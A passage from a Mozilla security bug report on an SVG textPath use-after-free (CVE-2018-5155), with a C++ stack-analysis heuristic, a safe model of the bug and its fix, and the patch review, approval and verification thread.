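    static const char* kLoop[] = {"nsThread::ProcessNextEvent", "NS_ProcessNextEvent",
                                  "MessageLoop::Run", "__libc_start_main", "main", "_start"};
    for (const char* l : kLoop) if (f == l) return true;
    return false;
}

struct Reentrancy {
    bool reentrant = false;
    std::string holder;   // innermost frame active on both stacks: the code holding the pointer
    std::string trigger;  // its callee on the free stack: the call that performed the free
};

// Walks the free stack from its innermost frame outwards and stops at the
// first frame that is also live on the use stack.
Reentrancy FindReentrantFree(const AsanReport& r) {
    Reentrancy out;
    std::set<std::string> inUse(r.useStack.begin(), r.useStack.end());
    for (size_t i = 0; i < r.freeStack.size(); ++i) {
        const std::string& f = r.freeStack[i];
        if (inUse.count(f) == 0) continue;
        if (IsEventLoopFrame(f)) break;  // only the dispatch loop is shared
        out.reentrant = true;
        out.holder = f;
        if (i > 0) out.trigger = r.freeStack[i - 1];
        break;
    }
    return out;
}

int main() {
    Reentrancy x = FindReentrantFree(ParseAsanReport(kReport));
    if (!x.reentrant) { std::cout << "free and use stacks share no frame above the event loop\n"; return 0; }
    std::cout << "freed while " << x.holder << " was active, via " << x.trigger << "\n";
}
```

On the excerpt this prints that the run was freed while SVGTextFrame::DoTextPathLayout was active, via nsSVGEnum::DOMAnimatedEnum::AnimVal, which is exactly the call the fix removes from layout. The heuristic is only as good as the event-loop list: if the shared frame it reports is a dispatch or message-pump function, treat the result as "not reentrant" and look for an ordinary lifetime bug instead.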
(Reporter)

Comment 1

a year ago
Posted file ASAN output
(Reporter)

Comment 2

a year ago
Group: core-security → layout-core-security
(Assignee)

Comment 3

a year ago
Posted patch patchSplinter Review
Well, I copied the lengthAdjust mechanism to get the side attribute, but that code was incorrect as it flushed animations. So although this particular exploit was introduced by bug 1446650, it must be possible to create a similar exploit via the lengthAdjust attribute too, and that exploit would exist in prior releases.
Assignee: nobody → longsonr
Attachment #8962523 - Flags: review?(dholbert)
(Assignee)

Comment 5

a year ago
Attachment #8962555 - Flags: review?(dholbert)
Can you clarify what the patches are doing & why that helps? It looks like you're switching to use EnumAttributes() rather than a direct accessor, but it's not obvious to me what the significance of that is.
Flags: needinfo?(longsonr)
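What the patch changes, as an added example that is not Mozilla's code: comment 3 says the side-attribute code flushed animations, and the review question above concerns the switch from a DOM accessor to EnumAttributes(). In the trace, the DOM accessor nsSVGEnum::DOMAnimatedEnum::AnimVal() flushes pending SMIL samples, the flush restyles and reflows, nsTextFrame::ClearTextRuns frees the gfxTextRun, and DoTextPathLayout carries on iterating the freed run. The C++ below reproduces that shape with hypothetical stand-in types (TextRun, TextFrame, AnimatedEnum and RunAllocator are not Gecko classes) and tracks liveness explicitly so the stale read is reported rather than executed; the fixed variant reads the already-sampled value without flushing, which is the effect of the EnumAttributes() change.

```cpp
#include <cstdint>
#include <functional>
#include <iostream>
#include <set>
#include <utility>
#include <vector>

struct TextRun {
    std::vector<uint32_t> advances;  // per-glyph advances read during layout
};

// Records which TextRun objects are live so a stale read can be reported
// instead of dereferencing freed memory (the role ASAN plays in the report).
struct RunAllocator {
    std::set<const TextRun*> live;
    TextRun* Create(std::vector<uint32_t> adv) {
        TextRun* r = new TextRun{std::move(adv)};
        live.insert(r);
        return r;
    }
    void Destroy(TextRun* r) { live.erase(r); delete r; }
    bool IsLive(const TextRun* r) const { return live.count(r) != 0; }
};

// Stand-in for nsTextFrame: owns a lazily built run that any restyle or
// reflow may discard (ClearTextRuns in the free stack).
struct TextFrame {
    RunAllocator& alloc;
    TextRun* run = nullptr;
    void EnsureTextRun() { if (!run) run = alloc.Create({10, 12, 9}); }
    void ClearTextRuns() { if (run) { alloc.Destroy(run); run = nullptr; } }
};

// Stand-in for nsSVGEnum::DOMAnimatedEnum. AnimVal() is the DOM-facing accessor:
// with a SMIL sample pending it flushes animations first, and the flush may
// restyle and reflow. The layout-facing getter returns the stored value only.
struct AnimatedEnum {
    int animValue = 1;
    bool smilSamplePending = false;
    std::function<void()> flushAnimations;  // restyle/reflow run by the flush

    int AnimVal() {
        if (smilSamplePending) { smilSamplePending = false; flushAnimations(); }
        return animValue;
    }
    int GetAnimValueNoFlush() const { return animValue; }  // EnumAttributes()-style read
};

enum class LayoutResult { Ok, StaleRead };

static uint32_t SumAdvances(const TextRun& run) {
    uint32_t s = 0;
    for (uint32_t a : run.advances) s += a;
    return s;
}

// Buggy shape: the run pointer is cached, then an accessor that can flush is
// called while the pointer is still needed.
LayoutResult DoTextPathLayoutBuggy(TextFrame& frame, AnimatedEnum& side, uint32_t& out) {
    frame.EnsureTextRun();
    TextRun* run = frame.run;  // raw pointer held across the next call
    int s = side.AnimVal();    // may flush -> ClearTextRuns -> delete run
    if (!frame.alloc.IsLive(run)) return LayoutResult::StaleRead;  // ASAN: heap-use-after-free
    out = SumAdvances(*run) * static_cast<uint32_t>(s);
    return LayoutResult::Ok;
}

// Fixed shape: layout reads the already-sampled value without flushing, so
// nothing on this stack can destroy the run it is about to iterate.
LayoutResult DoTextPathLayoutFixed(TextFrame& frame, AnimatedEnum& side, uint32_t& out) {
    frame.EnsureTextRun();
    int s = side.GetAnimValueNoFlush();
    TextRun* run = frame.run;
    if (!frame.alloc.IsLive(run)) return LayoutResult::StaleRead;
    out = SumAdvances(*run) * static_cast<uint32_t>(s);
    return LayoutResult::Ok;
}

// The testcase's situation: a SMIL sample is pending and its flush clears the
// frame's text runs. Runs one layout variant and reports what happened.
LayoutResult RunScenario(bool useFixedLayout, uint32_t& out) {
    RunAllocator alloc;
    TextFrame frame{alloc};
    AnimatedEnum side;
    side.smilSamplePending = true;
    side.flushAnimations = [&frame] { frame.ClearTextRuns(); };
    LayoutResult r = useFixedLayout ? DoTextPathLayoutFixed(frame, side, out)
                                    : DoTextPathLayoutBuggy(frame, side, out);
    frame.ClearTextRuns();  // release whatever is still live
    return r;
}

int main() {
    uint32_t out = 0;
    std::cout << "buggy: " << (RunScenario(false, out) == LayoutResult::StaleRead ? "stale read" : "ok") << "\n";
    std::cout << "fixed: " << (RunScenario(true, out) == LayoutResult::Ok ? "ok" : "stale read") << "\n";
}
```

The check to carry away from this bug: any accessor reachable from layout or painting that can run a flush (script, SMIL sampling, restyle, reflow) must not be called while a raw pointer into frame-owned data is live; either read the stored value, as the patch does, or re-fetch the pointer after the call and assume everything cached before it is gone.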
Comment on attachment 8962523 [details] [diff] [review]
patch

Review of attachment 8962523 [details] [diff] [review]:
-----------------------------------------------------------------

I see - thank you.

r=me
Attachment #8962523 - Flags: review?(dholbert) → review+
Comment on attachment 8962555 [details] [diff] [review]
auditing svg layout reveals one other dangerous call

Review of attachment 8962555 [details] [diff] [review]:
-----------------------------------------------------------------

This seems fine; r=me

You might want to shift code between these patches, though, so that one patch is Nightly-only (the textPath "side" stuff) and the other patch has everything else.

(Also, do remember to request sec-approval before landing anything here.)
Attachment #8962555 - Flags: review?(dholbert) → review+
(Assignee)

Comment 10

a year ago
Comment on attachment 8962555 [details] [diff] [review]
auditing svg layout reveals one other dangerous call

bug 1443092 just landed a functionally identical fix for this so it clearly was exploitable. Just the SVGTextFrame changes remain here then.
Attachment #8962555 - Attachment is obsolete: true
(Assignee)

Updated

a year ago
Attachment #8962526 - Attachment description: given sufficient fuzz this should be applicable to beta/ESR releases → patch for all (nightly/beta/ESR)
(Assignee)

Comment 12

a year ago
Comment on attachment 8962526 [details] [diff] [review]
The parts of the dholbert reviewed patch above that apply to all branches (nightly/beta/ESR)

[Security approval request comment]
How easily could an exploit be constructed based on the patch? I assume fairly easily even though there's no reproducing testcase.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? Would probably land without any checkin comment except for the bug number.

Which older supported branches are affected by this flaw? all of them.

If not all supported branches, which bug introduced the flaw? bug 569722

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be? Should apply everywhere

How likely is this patch to cause regressions; how much testing does it need? Highly unlikely. It's straightforward and the same fix functionally as bug 1443092

Note that I've done the auditing requested in bug 1443092 comment 16
Attachment #8962526 - Flags: sec-approval?
(Assignee)

Comment 13

a year ago
Comment on attachment 8963011 [details] [diff] [review]
The parts of the dholbert reviewed patch above that are nightly only

[Security approval request comment]
How easily could an exploit be constructed based on the patch? Presumably pretty easily given that this bug includes a reproducing testcase.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem? not really, I'd probably land with just the bug number.

Which older supported branches are affected by this flaw? nightly only

If not all supported branches, which bug introduced the flaw? bug 1446650

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be? no backports required, no branches affected

How likely is this patch to cause regressions; how much testing does it need? Highly unlikely to cause regressions (especially as this is a new feature).
Attachment #8963011 - Flags: sec-approval?
(Assignee)

Updated

a year ago
Attachment #8962526 - Attachment description: patch for all (nightly/beta/ESR) → The parts of the dholbert reviewed patch above that apply to all branches (nightly/beta/ESR)
(Assignee)

Updated

a year ago
Attachment #8963011 - Attachment description: nightly only patch → The parts of the dholbert reviewed patch above that are nightly only
Comment on attachment 8963011 [details] [diff] [review]
The parts of the dholbert reviewed patch above that are nightly only

sec-approval+ for both parts here. Let's make sure the Beta and ESR52 affecting patches get nominations for those branches as well.
Attachment #8963011 - Flags: sec-approval? → sec-approval+
Attachment #8962526 - Flags: sec-approval? → sec-approval+
https://hg.mozilla.org/mozilla-central/rev/edfd9ffbd720
https://hg.mozilla.org/mozilla-central/rev/dd2e77e4957e

Go ahead and do the branch approval requests when you're comfortable doing so :)
Status: NEW → RESOLVED
Last Resolved: a year ago
Flags: needinfo?(longsonr)
Resolution: --- → FIXED
Target Milestone: --- → mozilla61
(Assignee)

Comment 18

a year ago
Comment on attachment 8962526 [details] [diff] [review]
The parts of the dholbert reviewed patch above that apply to all branches (nightly/beta/ESR)

Approval Request Comment
[Feature/Bug causing the regression]: bug 569722
[User impact if declined]: I think this is an exploitable security issue given how similar this code is to bug 1443092 and this bug's actual exploit
[Is this code covered by automated tests?]: yes
[Has the fix been verified in Nightly?]: yes
[Needs manual test from QE? If yes, steps to reproduce]:  no
[List of other uplifts needed for the feature/fix]: bug 1443092 (although that has already landed)
[Is the change risky?]: no
[Why is the change risky/not risky?]: bug 569722 has automated tests. It's a small targeted fix
[String changes made/needed]: none
Flags: needinfo?(longsonr)
Attachment #8962526 - Flags: approval-mozilla-esr52?
Attachment #8962526 - Flags: approval-mozilla-beta?
Comment on attachment 8962526 [details] [diff] [review]
The parts of the dholbert reviewed patch above that apply to all branches (nightly/beta/ESR)

Approved for 60.0b9 and ESR 52.8.
Attachment #8962526 - Flags: approval-mozilla-esr52?
Attachment #8962526 - Flags: approval-mozilla-esr52+
Attachment #8962526 - Flags: approval-mozilla-beta?
Attachment #8962526 - Flags: approval-mozilla-beta+
Group: layout-core-security → core-security-release
Flags: qe-verify+
I've managed to reproduce this crash using the testcase from comment 2, on an affected ASAN Nightly build (61.01, 20180326091918).

This is verified fixed on the latest ASAN builds: Beta 60.0b10 (20180405001308), Nightly 61.0a1 (20180405001308) running Ubuntu 16.04 x64.

Ni myself to verify this on esr 52.8.0 as well.
Status: RESOLVED → VERIFIED
Flags: needinfo?(ciprian.georgiu)
Flags: sec-bounty?
Blocks: 1446650
Flags: sec-bounty? → sec-bounty+
Whiteboard: [adv-main60+][adv-esr52.8+]
Flags: needinfo?(ciprian.georgiu)
This crash is also verified fixed on 52.8.0esr (20180429211418) ASAN build, under Ubuntu 16.04 x64.
Flags: qe-verify+
Alias: CVE-2018-5155
Group: core-security-release